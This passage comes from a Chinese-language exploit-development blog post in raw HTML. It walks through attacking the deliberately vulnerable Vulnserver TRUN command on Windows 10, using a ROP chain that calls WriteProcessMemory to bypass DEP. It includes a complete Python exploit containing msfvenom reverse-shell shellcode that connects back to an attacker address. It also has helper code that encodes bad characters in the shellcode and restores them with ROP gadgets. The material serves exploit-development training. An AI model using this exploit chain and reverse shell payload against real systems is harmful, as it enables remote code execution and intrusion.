struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777878</span>) <span class="comment"># 0x77777878</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN</span></span><br></pre></td></tr></table></figure>
<p>完整的利用代码如下:(系统重启无效,因为很多<code>ROP Gadgets</code>源于开启<code>ASLR</code>的<code>DLL</code>,<code>ESSFUNC.DLL</code>中不具备完全的<code>ROP Chain</code>生成要素)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">Vulnserver TRUN exploit (ROP, DEP bypass).</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Vulnerable Software: Vulnserver</span></span><br><span class="line"><span class="string">Version: 1.00</span></span><br><span class="line"><span class="string">Exploit Author: Andres Roldan</span></span><br><span class="line"><span class="string">Tested On: Windows 10 20H2</span></span><br><span class="line"><span class="string">Writeup: https://fluidattacks.com/blog/vulnserver-trun-rop/</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">HOST = <span class="string">'192.168.91.142'</span></span><br><span class="line">PORT = <span class="number">9999</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'</span></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xbd\x77\x28\x83\xaa\xdb\xd9\xd9\x74\x24\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x58\x31\xc9\xb1\x52\x31\x68\x12\x03\x68\x12"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x9f\xd4\x61\x5f\xa3\xcd\xe4\xa0\x5b\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x89\x29\xbe\x3f\x89\x4e\xcb\x10\x39\x04\x99"</span></span><br><span class="line">shellcode += <span class="string">b"\x9c\xb2\x48\x09\x16\xb6\x44\x3e\x9f\x7d\xb3"</span></span><br><span class="line">shellcode += <span class="string">b"\x71\x20\x2d\x87\x10\xa2\x2c\xd4\xf2\x9b\xfe"</span></span><br><span class="line">shellcode += <span class="string">b"\x29\xf3\xdc\xe3\xc0\xa1\xb5\x68\x76\x55\xb1"</span></span><br><span class="line">shellcode += <span class="string">b"\x25\x4b\xde\x89\xa8\xcb\x03\x59\xca\xfa\x92"</span></span><br><span class="line">shellcode += <span class="string">b"\xd1\x95\xdc\x15\x35\xae\x54\x0d\x5a\x8b\x2f"</span></span><br><span class="line">shellcode += <span class="string">b"\xa6\xa8\x67\xae\x6e\xe1\x88\x1d\x4f\xcd\x7a"</span></span><br><span class="line">shellcode += <span class="string">b"\x5f\x88\xea\x64\x2a\xe0\x08\x18\x2d\x37\x72"</span></span><br><span class="line">shellcode += <span class="string">b"\xc6\xb8\xa3\xd4\x8d\x1b\x0f\xe4\x42\xfd\xc4"</span></span><br><span class="line">shellcode += <span class="string">b"\xea\x2f\x89\x82\xee\xae\x5e\xb9\x0b\x3a\x61"</span></span><br><span class="line">shellcode += <span class="string">b"\x6d\x9a\x78\x46\xa9\xc6\xdb\xe7\xe8\xa2\x8a"</span></span><br><span class="line">shellcode += <span class="string">b"\x18\xea\x0c\x72\xbd\x61\xa0\x67\xcc\x28\xad"</span></span><br><span class="line">shellcode += <span class="string">b"\x44\xfd\xd2\x2d\xc3\x76\xa1\x1f\x4c\x2d\x2d"</span></span><br><span class="line">shellcode += <span class="string">b"\x2c\x05\xeb\xaa\x53\x3c\x4b\x24\xaa\xbf\xac"</span></span><br><span class="line">shellcode += <span class="string">b"\x6d\x69\xeb\xfc\x05\x58\x94\x96\xd5\x65\x41"</span></span><br><span class="line">shellcode += <span class="string">b"\x38\x85\xc9\x3a\xf9\x75\xaa\xea\x91\x9f\x25"</span></span><br><span class="line">shellcode += <span class="string">b"\xd4\x82\xa0\xef\x7d\x28\x5b\x78\x42\x05\x6e"</span></span><br><span class="line">shellcode += <span class="string">b"\xf1\x2a\x54\x70\x10\xf7\xd1\x96\x78\x17\xb4"</span></span><br><span class="line">shellcode += <span class="string">b"\x01\x15\x8e\x9d\xd9\x84\x4f\x08\xa4\x87\xc4"</span></span><br><span class="line">shellcode += <span class="string">b"\xbf\x59\x49\x2d\xb5\x49\x3e\xdd\x80\x33\xe9"</span></span><br><span class="line">shellcode += <span class="string">b"\xe2\x3e\x5b\x75\x70\xa5\x9b\xf0\x69\x72\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x55\x5f\x8b\x98\x4b\xc6\x25\xbe\x91\x9e\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x7a\x4e\x63\x90\x83\x03\xdf\xb6\x93\xdd\xe0"</span></span><br><span class="line">shellcode += <span class="string">b"\xf2\xc7\xb1\xb6\xac\xb1\x77\x61\x1f\x6b\x2e"</span></span><br><span class="line">shellcode += <span class="string">b"\xde\xc9\xfb\xb7\x2c\xca\x7d\xb8\x78\xbc\x61"</span></span><br><span class="line">shellcode += <span class="string">b"\x09\xd5\xf9\x9e\xa6\xb1\x0d\xe7\xda\x21\xf1"</span></span><br><span class="line">shellcode += <span class="string">b"\x32\x5f\x41\x10\x96\xaa\xea\x8d\x73\x17\x77"</span></span><br><span class="line">shellcode += <span class="string">b"\x2e\xae\x54\x8e\xad\x5a\x25\x75\xad\x2f\x20"</span></span><br><span class="line">shellcode += <span class="string">b"\x31\x69\xdc\x58\x2a\x1c\xe2\xcf\x4b\x35"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">func = struct.pack(<span class="string">"<L"</span>,<span class="number">0x45454545</span>) <span class="comment"># WriteProcessMemory Address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Shellcode Return Address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0xFFFFFFFF</span>) <span class="comment"># pseudo Process handle</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Code cave address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy lpBuffer (Stack address) </span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy nSize</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62502028</span>) <span class="comment"># lpNumberOfBytesWritten</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">eip = struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501022</span>) <span class="comment"># retn essfunc.dll</span></span><br><span class="line"></span><br><span class="line">rop1 = struct.pack(<span class="string">"<L"</span>, <span class="number">0x755912d6</span>) <span class="comment"># PUSH ESP # POP ESI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x755b671f</span>) <span class="comment"># MOV EDX,ESI # POP ESI # RETN 0x04 </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7728bdf4</span>) <span class="comment"># MOV EAX,EDX # POP ESI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777878</span>) <span class="comment"># 0x77777878</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffffdf4</span>) <span class="comment"># 0xfffffdf4</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x62506090</span>) <span class="comment"># IAT 62506090 AddAtomA KERNEL32 </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75fd7518</span>) <span class="comment"># XCHG EAX,DWORD PTR [ECX] # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7557771b</span>) <span class="comment"># POP EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffd9df0</span>) <span class="comment"># 0xfffd9df0</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f2002</span>) <span class="comment"># XCHG EAX,ESP # RETN </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">padding = <span class="string">b"C"</span> * (<span class="number">3000</span><span class="number">-2006</span><span class="number">-32</span>-len(rop1)-len(shellcode))</span><br><span class="line"></span><br><span class="line">PAYLOAD = (</span><br><span class="line"> <span class="string">b'TRUN .'</span> +</span><br><span class="line"> <span class="string">b'A'</span> * (<span class="number">2006</span>-len(func)) +</span><br><span class="line"> func +</span><br><span class="line"> eip +</span><br><span class="line"> rop1 + </span><br><span class="line"> <span class="string">b"\x90"</span>*<span class="number">128</span>+</span><br><span class="line"> shellcode+</span><br><span class="line"> padding</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> socket.create_connection((HOST, PORT)) <span class="keyword">as</span> fd:</span><br><span class="line"> fd.sendall(PAYLOAD)</span><br></pre></td></tr></table></figure>
<p>执行,出现问题了:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/14.png" alt="BOF"></p>
<p>因为<code>msfvenom</code>解码存根希望代码存储在可写的内存里面,但是这里并没有。<code>msfvenom</code>解码器在这里变得无法使用,只能利用其他办法,比如自己写不包含坏字符的<code>shellcode</code>;或者替换坏字符,并在代码复制到代码段之前,恢复这些坏字符,这需要增加一些恢复的<code>ROP Gadgets</code>。</p>
<p><strong>自定义shellcode</strong>:这里有个需要注意的地方,那就是遇到坏字符的处理,可以将产生坏字符的指令替换成其他指令,改变寄存器的值等,有点类似之前<code>egghunter</code>生成存在<code>00</code>字符时,改变指令的方法。这里利用外国友人的<a href="https://github.com/epi052/osed-scripts/blob/main/shellcoder.py" target="_blank" rel="noopener">脚本</a>,来生成<code>shellcode</code>:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/15.png" alt="BOF"></p>
<p>注意对坏字符的检测,这里检测到坏字符,需要自己定位到相应的指令处,手动修改。多个坏字符用空格间隔开。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/16.png" alt="BOF"></p>
<p>将利用脚本里面的<code>shellcode</code>部分替换成这里生成的<code>shellcode</code>,再次执行,喜闻乐见的反弹<code>shell</code>出现了:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/17.png" alt="BOF"></p>
<p><strong>编码和解码shellcode:</strong>这种方法稍微复杂点,需要增加一些解码的<code>ROP Gadget</code>,在构建<code>ROP Chain</code>的时候,随着解码坏字符的<code>ROP Gadget</code>的增加,栈空间会随着增加,如果坏字符比较多,所需要的栈空间会更多。编码和解码部分的代码如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mapBadChars</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> i = <span class="number">0</span></span><br><span class="line"> badIndex = []</span><br><span class="line"> <span class="keyword">while</span> i < len(sh):</span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> BADCHARS:</span><br><span class="line"> <span class="keyword">if</span> sh[i] == c:</span><br><span class="line"> badIndex.append(i)</span><br><span class="line"> i=i+<span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> badIndex</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encodeShellcode</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> REPLACECHARS = <span class="string">b"\xff"</span></span><br><span class="line"> encodedShell = sh</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> encodedShell = encodedShell.replace(struct.pack(<span class="string">"B"</span>, BADCHARS[i]), struct.pack(<span class="string">"B"</span>, REPLACECHARS[i]))</span><br><span class="line"> <span class="keyword">return</span> encodedShell</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decodeShellcode</span><span class="params">(dllBase, badIndex, shellcode)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> CHARSTOADD = <span class="string">b"\x01"</span></span><br><span class="line"> restoreRop = <span class="string">b""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(badIndex)):</span><br><span class="line"> <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line"> offset = badIndex[i]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> offset = badIndex[i] - badIndex[i<span class="number">-1</span>]</span><br><span class="line"> neg_offset = (-offset) & <span class="number">0xffffffff</span></span><br><span class="line"> value = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> <span class="keyword">if</span> shellcode[badIndex[i]] == BADCHARS[j]:</span><br><span class="line"> value = CHARSTOADD[j]</span><br><span class="line"> value = (value) | <span class="number">0x11111100</span> <span class="comment"># DL</span></span><br><span class="line"> print(hex(value))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x7637768e</span>)) <span class="comment"># POP ECX # RETN ** [WS2_32.DLL] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (neg_offset))</span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x758ba9a8</span>)) <span class="comment"># SUB EAX,ECX # RETN ** [KERNEL32.DLL] ** </span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (<span class="number">0x7721aed0</span>)) <span class="comment"># POP EDX # RETN ** [ntdll.dll] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (value)) <span class="comment"># values in DL</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x755bc4eb</span>)) <span class="comment"># ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] ** </span></span><br><span class="line"> <span class="keyword">return</span> restoreRop</span><br></pre></td></tr></table></figure>
<p>这个算法的思路就是把每个坏字符的位置保存到一个列表里面,然后从头到尾进行遍历,到达坏字符的位置之后,进行某种运算,这里用的加法,因为<code>0x00-0xff=0x01</code>。我这里是从<code>shellcode</code>的开始位置往后遍历,有的也用开始位置之前往后遍历,主要是看能不能正确遍历每一个值,具体哪种视情况而定。还有上述<code>value=(value)|0x11111100</code>,这里<code>ROP Gadget</code>使用<code>DL</code>,为了保证其他为不会出现<code>00</code>,所以使用了<code>0x11111111</code>,另外不局限于<code>DL,AL,AH,BL,BH</code>等等都可以,关键在于能够找到符合要求的<code>ROP Gadget</code>。</p>
<p>考虑到<code>ROP Gadgets</code>会比较长,这里有个小技巧,用于开辟一块比较大的栈空间存储<code>ROP Gadgets</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Patching dummy lpBuffer</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777988</span>) <span class="comment"># 0x77777988</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN</span></span><br></pre></td></tr></table></figure>
<p>这里使用<code>0x88888888+0x77777988=0000000100000210</code>(高<strong>8位</strong>截断,所以为<code>0x210</code>),要多大栈空间,可以大致评估出来,比如先确定有多少坏字符,每个坏字符需要多少<code>bytes ROP Gadgets</code>进行处理,加上处理<code>WriteProcessMemory</code>三个参数的<code>ROP Gadgets</code>,再加上对齐<code>shellcode</code>的<code>ROP Gadgets</code>和改变<code>ESP</code>到执行流的<code>ROP Gadgets</code>。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/18.png" alt="BOF"></p>
<p>可以看到已经指向了<code>\x90</code>区域。</p>
<p>后续需要注意的就是,解码之前需要让<code>ESP</code>正好指向<code>shellcode</code>开始的部分,我这里的ROP Gadgets如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Align EAX with shellcode</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>,<span class="number">0xfffffda8</span>) <span class="comment"># 0n600</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772974e4</span>) <span class="comment"># SUB EAX,ECX # RETN ** [ntdll.dll] **</span></span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/19.png" alt="BOF"></p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/20.png" alt="BOF"></p>
<p>还有一个需要注意的地方,因为是自己来进行编码和解码,用<code>msfvenom</code>仅需生成原始<code>shellcode</code>即可。如本地使用如下:</p>
